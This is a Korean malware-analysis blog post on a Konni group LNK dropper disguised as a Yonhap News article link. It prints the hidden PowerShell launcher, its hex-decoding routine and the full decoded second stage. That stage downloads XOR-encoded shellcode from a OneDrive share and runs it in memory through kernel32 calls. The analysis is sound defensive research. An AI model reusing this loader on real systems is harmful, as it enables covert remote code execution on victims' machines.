북한 해킹 그룹 중 하나로 분류되는 konni 그룹의 악성코드를 발견해 분석한다.
- sha256: 1b78477a71df02b68f24e8c8c77f3858624b0bc9e4442ce193bde1c298160fc4
해당 악성코드는 아래 그림처럼 lnk 파일로 위장하고 있다.
실제로 파일 실행시에는 연합뉴스의 기사로 연결되게끔 설정이 되어있다. 피해자에게는 연합뉴스의 기사를 띄우고, 동시에 또 다른 악성코드를 다운로드 하는 행위가 수행된다.
악성행위를 위해서 연합뉴스 기사 링크 연결부 아래에 위치하는 아래와 같이 powershell 실행 명령어가 실행된다. 실행시에는 hidden 옵션등을 활용해 피해자가 해당 명령이 실행되고 있는지 모르게끔 설정한다.
start /min c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command
"$oracle ="$slardar="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C---중략---3657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";
for($i=0;$i -le $slardar.Length-2;$i=$i+2)
{
$NTMO=$slardar[$i]+$slardar[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));
};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($oracle));
while(true){}"
위 파워쉘 명령어는 1차로는 $slardar 에 할당된 16진수 문자열들을 16진수에서 문자열로 해독하는 행위를 수행한다. 16진수 문자열이 문자열로 변환되면 아래와 같이 또 다른 파워쉘 코드가 나타난다.
[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072);
$aa='[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);';
$b=Add-Type -MemberDefinition $aa -Name "AAA" -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);';
$aab=Add-Type -MemberDefinition $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https://api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2IvcyFBa0FnekZKdWMwb09hdDdWMWRNWkIzanFPTXM_ZT1KUU1JcnI/root/content";
$bb='[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);';
$ccc=Add-Type -MemberDefinition $bb -Name "BBB" -PassThru;$ddd='[DllImport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';
$fff=Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru;$e=112;
do {
try {
$c.Headers["user-agent"] = "connnecting...";$xmpw4=$c.DownloadData($d);
$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100);$old = 0;
$aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);
for ($h = 1;$h -lt $xmpw4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) );};
try{
throw 1;
}catch{
$handle=$ccc::CreateThread(0,0,$x0,0,0,0);$fff::WaitForSingleObject($handle, 500*1000);
};
$e=222;
}catch{
sleep 11;$e=112;
}
}while($e -eq 112);
해당 파워쉘 코드는 user-agent 등을 설정하고 Thread를 생성해 특정 url로 연결한다. url은 onedrive 주소로써 추가적인 악성코드의 배포를 유도한 듯 하다. 하지만, 현재 접속시 해당 파일은 삭제된 것으로 보여져 추가적인 다운로드 행위는 일어나지 않는다.
https://www.estsecurity.com/enterprise/security-center/notice/view/454860?category-id=
이스트시큐리티 기업 | 공지사항 | 북 해킹 조직, 공정거래위원회 사칭 피싱 공격 진행중!
공정거래위원회를 사칭한 피싱 메일을 통해 악성파일이 유포되고 있어 사용자들의 각별한 주의가 필요합니다. 이번에 발견된 피싱 메일은 '[공정거래위원회] 서면 실태조사 사전 예고
www.estsecurity.com
위 링크에 나타난 바와 같이, 이전 konni 그룹의 공격 수행 양상과 닮아있는 부분은 아래와 같다.
- lnk 파일 위장
- lnk 파일 내 powershell 코드 사용
- 16진수 문자열을 문자열로 변환 및 변환된 문자열이 파워쉘 코드
- google drive, onedrive 등의 정상적인 클라우드를 통해 추가적인 악성코드 배포
연결되는 onedrive에 추가적인 악성파일이 존재했다면 이전 행위들과 연관지어볼 때 예상되는 행위는 아래와 같다.
1. vbs 파일 추가 배포
2. 피해자 PC 정보 탈취 및 C&C 서버 전송
해당 악성 파일은 이메일로 유포되었으며, 유포된 이메일 계정과 관련되어 보이는 freelancer 계정은 아래와 같다.
'Analysis' 카테고리의 다른 글
| 54. Kimsuky's Puyi (CHM malware) (0) | 2023.09.05 |
|---|---|
| 53. NK(Kimsuky)'s malware in VirusTotal (0) | 2023.08.29 |
| 51. Kimsuky's powershell keylogger (0) | 2023.08.02 |
| 50. Kanti ransomware (nim language) (0) | 2023.07.25 |
| 49. Charming Kitten's POWERSTAR (0) | 2023.07.11 |
